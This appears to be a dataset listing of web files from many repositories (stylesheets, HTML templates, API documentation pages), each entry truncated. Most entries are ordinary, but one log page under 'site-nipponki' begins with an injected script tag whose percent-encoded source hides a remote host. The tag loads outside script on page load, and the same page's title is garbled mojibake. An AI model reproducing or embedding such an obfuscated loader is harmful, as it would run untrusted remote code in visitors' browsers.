path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
widgets/common/assets/shadows/aqua/aquaAliceBlue/aquaAliceBlue3.css
idutta2007/yiigems
.aquaAliceBlue3, .hover_aquaAliceBlue3:hover, .active_aquaAliceBlue3:active { -webkit-box-shadow: 0 0.63em 0.75em rgba(206, 237, 255, .39), inset 0 -0.5em 0.9em 0 #ffffff, inset 0 -0.5em 0em 0.65em rgb(155, 217, 255), inset 0 0em 0.5em 2em rgb(255, 255, 255); -moz-box-shadow: 0 ...
doc/app/Event.html
malprax/try_timer
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>class Event - Rails Application Documentation</title> <script type="text/javascript"> var rdoc_rel_prefix = "./"; </script> <script src="./js/jquery.js"></script> <script src="./js/darkfish.js"></script> <link href="./css/fonts.css" rel="stylesheet"> <l...
src/css/language-bar.css
LinogeFly/twitch-language-filter
/* General styles */ .tlf-languageBar { font-size: 14px; text-align: center; position: relative; background: #6441a5; cursor: pointer; } .tlf-languageBar.tlf-disabled { background: #8c8c8c; } .tlf-languageBar-current { color: #fff; display: inline-block; line-height: normal; ...
_layouts/products.html
Hasan-Yavuz/ecommerce-website
--- layout: default --- <a href= "{{site.baseurl}}/products/{{page.category}}">Return to Category</a> <h1>{{page.name}}</h1> <div class="grid"> <img class="unit unit-s-1 unit-m-1-2 unit-l-1-3 img-flex" src="{{site.baseurl}}/images/{{page.image}}"> <div class="unit unit-s-1 unit-m-1 unit-l-1"> {{content}} ...
application/assets/css/responsive.css
Roosterbear/educacion-a-distancia
@media (min-width: 768px) { /* HEADER */ #headerComplete{ margin-left: 93px; margin-right: 93px; text-align: left; } #headerIndividualsMenu{ text-align: right; } .individuals, .individuals a{ font-size: 1.3em; } .startNow a{ font-size: 1.2em; } /* MENU */ #oferta > td a{ display: table-row...
demo/index.html
Medycation/acute-select
<!DOCTYPE html> <html id="ng-app" ng-app="acuteSelectTest"> <head> <title></title> <!--[if lte IE 8]> <script type="text/javascript" src="/Scripts/json2.js"></script> document.createElement('ac-select'); </script> <![endif]--> <script src="//localhost:35729/livereload.js"></script>...
app/data/example/settings.html
blingzubling/liveplan
<html> <body> <h1>My settings of object</h1> <p>one</p> <p>two</p> </body> </html>
vsdoc/topic_00000000000000D5_vars--.html
asiboro/asiboro.github.io
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="GENERATOR" content="VSdocman - documentation generator; htt...
src/card-element.html
xgrommx/aurelia-solitaire
<template> <div class="drag-source"> <div class="card-group"> <img src.bind="card.up ? src : 'img/back.png'" class="card" class.bind="(card.up ? 'up' : 'down')" click.delegate="click()" draggable="false"> <card if.bind="card.next" card.bind="card.next"></card> </div> </div> </template>
_site/blog/uses-python-to-encrypt-huge-files/index.html
glassdfir/glassdfir.github.io
<!doctype html> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]--> <!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<!...
tools/armgcc/share/doc/gcc-arm-none-eabi/html/gcc/Method-signatures.html
marduino/stm32Proj
<html lang="en"> <head> <title>Method signatures - Using the GNU Compiler Collection (GCC)</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="Using the GNU Compiler Collection (GCC)"> <meta name="generator" content="makeinfo 4.11"> <link title="Top" rel="start" href="index.ht...
documentation/versions/miruken-dotnet/Miruken.Mediate/2.0.8/article/en-US/requestAndResponse.html
miruken/miruken.github.io
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Request And Response &mdash; Miruken.Mediate...
ajax/libs/antd/4.5.3/antd.dark.css
cdnjs/cdnjs
/*! * * antd v4.5.3 * * Copyright 2015-present, Alipay, Inc. * All rights reserved. * */ /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before...
back-to-you/index.html
beccasafan/radio-promo
<!DOCTYPE html> <html> <head> <script> window.location.href="https://beccasafan.github.io/radio-promo/twitter/"; </script> </head> <body> <h3>If you are not automatically redirected, please <a href="https://beccasafan.github.io/radio-promo/twitter/">click here</a>.</h3> </body> </html>
templates/pages.html
finder/cache_plot
{% extends "main.html" %} {% block pages_header %} Pages {% endblock %} {% block content %} <h3>Worst Pages:</h3> <table border=1> <tr> <th>#</th> <th>Path</th> <th>Hits</th> <th>Misses</th> <th>Hit Ratio</th> <th>Times Visited...
CSS3动画/styles/index.css
irockyan/BlogEvents
h1 { text-align: center; padding: 30px; } .animation { height: 50vh; background-color: #eee; padding: 20px; margin-bottom: 50px; display: flex; } .box, .desc { flex: 1; } /* 第一个动画 */ .animation_strike { position: relative; } .block, .wall { position: absolute; top: 50%; transform: translat...
Contents/Resources/Documents/classgoogle_1_1appengine_1_1api_1_1search_1_1search_1_1_rescoring_match_scorer.html
tzmartin/gae-python.docset
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
ajax/libs/oojs-ui/0.40.3/oojs-ui-apex-icons-user.rtl.css
cdnjs/cdnjs
/*! * OOUI v0.40.3 * https://www.mediawiki.org/wiki/OOUI * * Copyright 2011–2020 OOUI Team and other contributors. * Released under the MIT license * http://oojs.mit-license.org * * Date: 2020-09-02T15:43:15Z */ .oo-ui-icon-userAdd { background-image: /* @embed */ url(themes/wikimediaui/images/icons/userAdd-...
ajax/libs/handsontable/8.0.0-beta.1/handsontable.css
cdnjs/cdnjs
/*! * Copyright (c) HANDSONCODE sp. z o. o. * * HANDSONTABLE is a software distributed by HANDSONCODE sp. z o. o., * a Polish corporation, based in Gdynia, Poland, at 96/98 Aleja Zwycięstwa, * registered with the National Court Register under number 538651, * EU tax ID number: PL5862294002, share capital: PLN 6...
ajax/libs/pure/2.0.0/menus-horizontal-min.css
cdnjs/cdnjs
/*! Pure v2.0.0 Copyright 2013 Yahoo! Licensed under the BSD License. https://github.com/pure-css/pure/blob/master/LICENSE.md */ .pure-menu-horizontal{width:100%;white-space:nowrap}.pure-menu-horizontal .pure-menu-list{display:inline-block}.pure-menu-horizontal .pure-menu-heading,.pure-menu-horizontal .pure-menu-item,....
data/president/n705001300000000/20160116135313/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" ty...
css/style.css
themewagon/the_portfolio
body { background: #eee; } a { color: #ed5b5b; } a:hover, a:focus { color: #ed5b5b; } h1 { font-family: 'Satisfy', cursive; font-size: 100px; text-align: center; color: #bd2929; margin: 50px; } h2 { font-family: 'Satisfy', cursive; font-size: 30px; line-height: 45px; marg...
tutorial/index.html
Stexxen/activator-akka-distributed-workers-java
<html> <head> <title>Akka Distributed Workers - Activator Template</title> </head> <body> <div> <h2>The Goal</h2> <p> Some applications need to distribute work to many machines because one single box obviously has limited resources. This tutorial will explain how to implement distributed workers with Akka c...
data/TPE-8/n100080000000000/20160116053013/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" ty...
blog/2009/05/i-want-one-2009-part-3.html
Stwissel/stwissel.github.io
<!DOCTYPE html> <html lang="en"> <head> <title>I want one - 2009 Part 3 - NotesSensei's Blog</title> <script> window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-72033-1', 'auto'); ga('send', 'pageview'); </script> <script async src='https://www.google-analytics.com/analyti...
data/president/n600002800000000/20160116104613/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" ty...
index.html
sonicsmith/InformedNutrition
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>InformedNutrition</title> <script> // install babel hooks in the renderer process require('babel-register'); require('./scripts/MainView'); </script> </head> <body> <div id="content" /> </body> </html>
doc/Projects/2020/Project2/html/Project2.html
CompPhysics/MachineLearning
<!-- Automatically generated HTML file from DocOnce source (https://github.com/hplgit/doconce/) --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="DocOnce: https://github.com/hplgit/doconce/" /> <meta name="viewport" content="width=device-width, initi...
data/president/n703000600000000/20160116110138/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" ty...
data/TXG-6/n400060000000000/20160116060539/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" ty...
data/president/n710001600000000/20160116132404/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" ty...
ClassicalMyth/carouselcover.html
Marie-ClaireBeaulieu/Marie-ClaireBeaulieu.github.io
<!DOCTYPE html> <html lang="en"> <head> <title>Carousel cover</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"> ...
_includes/read-more.html
jinntrance/blog
<div class="read-more"> {% for post in site.related_posts limit:1 %} <div class="read-more-header"> <a href="{{ site.url }}{{ page.previous.url }}" class="read-more-btn">Read More</a> </div><!-- /.read-more-header --> <div class="read-more-content"> <h3><a href="{{ site.url }}{{ post.url }}" t...
www/partials/partial-home.html
zerozero/versus
<ion-view> <ion-content padding="true"> <ion-list> <ion-item ng-repeat="item in items" item="item" ng-click="showDetail(item.key)"> {{item.data.name}}: {{item.data.player1}} vs {{item.data.player2}} </ion-item> </ion-list> </ion-content> <a class="ne...
templates/registration/login.html
ignaciorecuerda/gestionpedidos_django
{% extends "base.html" %} {% block body_block %} <link href="http://getbootstrap.com/examples/signin/signin.css" rel="stylesheet"> <form class="form-signin" role="form" method="post" action="."> {% csrf_token %} <h2 class="form-signin-heading">Iniciar sesión</h2> <input class="form-control" placeholder="Usuario" id...
code/c06-SPA-Frameworks-and-AngularJS/c06s08/example-02/page.html
xiliax/web-programming-fundamentals
<div> path: {{path}} <hr/> $routeParams: <div style="border: solid"> {{params | json}} </div> </div>
style.css
fabricelallemand/mathslallemand
div .syntaxhighlighter { display: block; margin: 0px auto !important; width: 75% !important; border-radius: 5px; padding: 5px; margin-bottom: 10px !important; }
index.html
kthxbyte/kthxbyte.github.io
<!doctype html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="chrome=1"> <meta name="google-site-verification" content="VjZ5n7D61YqcBjoTPjcL1ABrnu6sC5WDe4vPd5yofgw" /> <title>kthxbye was already taken</title> <link rel="stylesheet" href="stylesheets/styles.css">...
app/directives/loadOrderModal.html
matortheeternal/shampoo
<div class="modal-container"> <div class="modal skinny-modal" ng-click="clearSelection()" tabindex="0" ng-keypress="onKeyPress($event)"> <form> <h3>Load Order</h3> <section> <ul class="checkbox-list"> <li ng-repeat="item in loadOrder" ng-class="{ '...
doc/api/cc/mallet/util/tests/TestStrings.html
burrsettles/mallet
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_37) on Wed Jan 23 11:07:59 EST 2013 --> <TITLE> TestStrings (Mallet 2 API) </TITLE> <META NAME="date" CONTENT="2013-01-23"> <LINK REL ="stylesheet"...
plugins/org.eclipse.oomph.setup.doc/javadoc/org/eclipse/oomph/setup/jdt/class-use/JDTPackage.html
peterkir/org.eclipse.oomph
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>Uses of Interface org.eclipse.oomph.setup.jdt.JDTPackage (Oomph Setup Documentation)</title> <meta name="date" content=""> <link rel="stylesheet" type="text/css" href="...
sdk/GUID-3D124010-B39C-3648-B799-76EFF3133D11.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Co...
sdk/GUID-A9F163F2-C0C6-35DE-9BA2-6523C906B7FB.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Co...
doc/parallelcolt-0.10.1/cern/jet/random/tfloat/engine/package-tree.html
endbegin/parallelcolt-test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_21) on Mon Jul 29 22:10:54 CEST 2013 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>cern.jet.random.tf...
resources/template.html
TerjeNorderhaug/cococare
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <!-- <meta http-equiv="X-UA-Compatible" content="IE=edge"> --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta content="yes" name="mobile-web-app-capable"> <title>cljsnode</title> <link href="https://max...
doc/com/runescape/revised/actor/location/island/impl/KaramjaIsland.html
RodriguesJ/Atem
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Thu Jun 12 19:18:14 EDT 2014 --> <title>KaramjaIsland</title> <meta name="date" content="2014-06-12"> <link rel="stylesheet" typ...
web/org.ossmeter.webapp/app/views/project.scala.html
ossmeter/ossmeter
@(project: org.ossmeter.repository.model.Project) @import org.ossmeter.repository.model.MetricProviderType @import org.ossmeter.repository.model.eclipse.EclipseProject @main("OSSMETER", true) { <section class="row"> <div class="span6"> <h1>@project.getName()</h1> <p>@project.getDescription()</p> </div> <...
MyLab1/apps/MyLab1/iphone/native/www/default/css/main.css
ColeHopkins/OrangeTeam
/* Stylesheet content from css/main.css in folder common */ /* Stylesheet content from css/main.css in folder iphone */ /* this CSS file extends the application CSS file found under common\css */ /*Optional iOS 7 status bar filler*/ #wl_ios7bar{ background-color: white; height: 15pt; position: fixed; top: 0; l...
sdk/GUID-B529E35B-0970-3E30-B86F-E572DD127B62.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Co...
sdk/GUID-246BEEBC-B25E-3357-BBB4-D543A524BACF.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Co...
dashboard/src/components/widget/html-source/che-html-source.html
sleshchenko/che
<!-- Copyright (c) 2015-2018 Red Hat, Inc. All rights reserved. This program and the accompanying materials are made available under the terms of the Eclipse Public License v1.0 which accompanies this distribution, and is available at http://www.eclipse.org/legal/epl-v10.html Contributors: ...
Desktop/tool/poi-bin-3.15-20160924/poi-3.15/docs/apidocs/org/apache/poi/poifs/crypt/standard/class-use/StandardEncryptionHeader.html
tommylsh/test20170719
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>Uses of Class org.apache.poi.poifs.crypt.standard.StandardEncryptionHeader (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../.....
Desktop/tool/poi-bin-3.15-20160924/poi-3.15/docs/apidocs/org/apache/poi/hssf/util/HSSFRegionUtil.html
tommylsh/test20170719
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>HSSFRegionUtil (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="te...
sdk/GUID-E3A24EF5-63C2-33E3-95C1-A8EFDA9A197A.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Co...
Desktop/tool/poi-bin-3.15-20160924/poi-3.15/docs/apidocs/org/apache/poi/ss/formula/ptg/class-use/ErrPtg.html
tommylsh/test20170719
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>Uses of Class org.apache.poi.ss.formula.ptg.ErrPtg (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" titl...
plugins/org.eclipse.oomph.setup.doc/javadoc/org/eclipse/oomph/setup/impl/class-use/TextModifyTaskImpl.html
peterkir/org.eclipse.oomph
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>Uses of Class org.eclipse.oomph.setup.impl.TextModifyTaskImpl (Oomph Setup Documentation)</title> <meta name="date" content=""> <link rel="stylesheet" type="text/css" h...
sdk/guid-6013a680-57f9-415b-8851-c4fa63356636/_t_any_r_objects2_8cpp_source.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: examples/Base/MemMan/Cleanup/TAnyRObjects2/...
resources/public/index.html
psalaberria002/om-conways
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="css/style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="app"></div> <script src="js/compiled/conway.js" type="text/javascript"></script> </bo...
Desktop/tool/poi-bin-3.15-20160924/poi-3.15/docs/apidocs/org/apache/poi/sl/draw/binding/class-use/ObjectFactory.html
tommylsh/test20170719
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>Uses of Class org.apache.poi.sl.draw.binding.ObjectFactory (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.c...
chord_output/path_TCE238.html
cos/evaluation-junit
<td xmlns="http://www.w3.org/1999/xhtml" style="width:50%"><table class="details"><colgroup><col width="35%"/><col width="65%"/></colgroup><tr><td class="head4" colspan="2"> Path (complete)</td></tr><tr><td class="head4">Enclosing Lock(s)</td><td class="head4">Call Site(s)</td></tr><tr><td></td><td><a hre...
resources/index.html
TurtleVision/turtle-om
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="css/style.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://maxcdn.boots...
QuickConnectPay/apidocs/com/newland/me/module/lcd/package-summary.html
yc654084303/QuickConnQuickConnect
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_65) on Thu Jan 15 14:03:16 CST 2015 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> com.newland.me.module.lcd (Newlan...
resources/home-ext.html
Rainbowlzy/slsms
{% extends "base.html" %} {% block refer %} <script> <<<<<<< HEAD function show(productid){ window.location.href="/product-detail/"+productid; } function deleteproduct(productid){ $.ajax("/delete-product",{method:"POST",data:{_id:productid}}).done(function(msg){window.location.href="/"}); } ======= ...
s_root/CACHE/css/style.5c6e0357fdf6.css
ncongleton/njcongleton.com
/* line 4, /home/nick/webdev/websites/njcongleton/mywebsite/static/css/external/neat/grid/_box-sizing.scss */ html { box-sizing: border-box; } /* line 9, /home/nick/webdev/websites/njcongleton/mywebsite/static/css/external/neat/grid/_box-sizing.scss */ *, *::after, *::before { box-sizing: inherit; } /*! normalize...
doc/source/html/annotated.html
MicroTrustRepos/microkernel
<html> <head> <title>L4Re Reference Manual</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </HEAD> <body style="background: #fff url(header-bg.png) repeat-x scroll 0 0"> <div> <div style="text-align: center; margi...
Schrodinger/Schrodinger_2015-2_docs/python_api/api/schrodinger.pipeline.stages.qsite.QSiteStage-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.pipeline.stages.qsite.QSiteStage</title> <link rel="stylesheet" href="epydoc.cs...
src/main/resources/userEmailTemplate-feedbackSessionClosed.html
Malkone/teammates
<p>Hello ${userName},</p> ${instructorFragment} <p> The following session is now closed. You can still view your submission by going to the link sent earlier, but you will not be able to edit existing responses or submit new responses. <div> <table style="max-width:600px;border:1px solid black;"> ...
liblinphone-sdk/armv7s-apple-darwin/share/doc/ortp-0.22.0/html/structStunAtrString.html
dungproton/noname
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
MemoEditor/Resources/default.css
damulhan/MemoEditor
body { border-right: thin groove; border-top: thin groove; border-left: thin groove; border-bottom: thin groove; font-family: 'Malgun Gothic', Arial,'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; font-size: 14px; } p { margin:0; }
_variables/comment_content.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $comment_content</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-p...
awstats/ftp/awstats.ftp.site29.unknownbrowser.html
tea2sugars/perfecthavoc
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang='en'> <head> <meta name="generator" content="AWStats 6.8 (build 1.910) from config file awstats.ftp.site29.conf (http://awstats.sourceforge.net)"> <meta name="robots" content="noindex,nofollow"> <meta http-equiv="content-type" content="text/html...
lib/apache-jena-2.12.1/javadoc-sdb/com/hp/hpl/jena/sdb/layout2/hash/class-use/FmtLayout2HashDB2.html
knil-sama/YADDW
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_45) on Thu Oct 02 16:45:06 BST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Class com.h...
coflo-0.0.4/third_party/boost_1_48_0/doc/html/boost_asio/reference/buffer/overload28.html
charlesDGY/coflo
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>buffer (28 of 28 overloads)</title> <link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../../../boost_asio...
skin/frontend/smartwave/default/ajaxcatalog/css/style.css
miguelangelramirez/magento.dev
#resultLoading{ width: 100%; height: 100%; position: fixed; z-index: 5000; top: 0; left: 0; } #resultLoading .bg{ width: 100%; height: 100%; position: fixed; top: 0; background: url(../images/ajax_overlay.png); } #resultLoading .bg .loading-icon { position...
_variables/last_status.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $last_status</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print...
docs/rtl.html
philwareham/txp-classic-admin-theme
<!DOCTYPE html> <html lang="en-gb" dir="rtl"> <head> <meta charset="utf-8"> <title>Classic theme design patterns 4.9 &#124; Textpattern CMS</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="../dist/classic/assets/css/textpattern.css"> <link rel...
landing/index.html
wolfrain56/motortracker
<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <link rel="stylesheet" type="text/css" href="styles/css/index.css"> <link href='http://fonts.googleapis.com/css?family=Raleway' rel='stylesheet' type='text/css'> <title>Motor Tracker</title> </head> <body> <img id="logo" src="images/logo.png"...
static/solar/solar.html
acevest/monitor
<!doctype html> <html> <head> <script src="../engine/build/output/playcanvas-latest.js"></script> <link href="../engine/examples/style.css" rel="stylesheet" /> </head> <script> function createMaterial(colors) { var material = new pc.scene.PhongMaterial(); for (var param in co...
logs/site-nipponki/02021659646.html
ForAEdesWeb/AEW25
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×...
archives/2016/05/index.html
lnho/lnho.github.io
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Archives: 2016/5 | Hexo</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="description"> <meta property="og:type" content="website"> <meta property="og:title" content="Hexo"> <meta property="og:...
User Guides/offline/user-guide/shortcodes/using-shortcodes-with-slugs/index.html
yehaicao/THE7-CN-WWW.WORDPRESSLEAF.COM
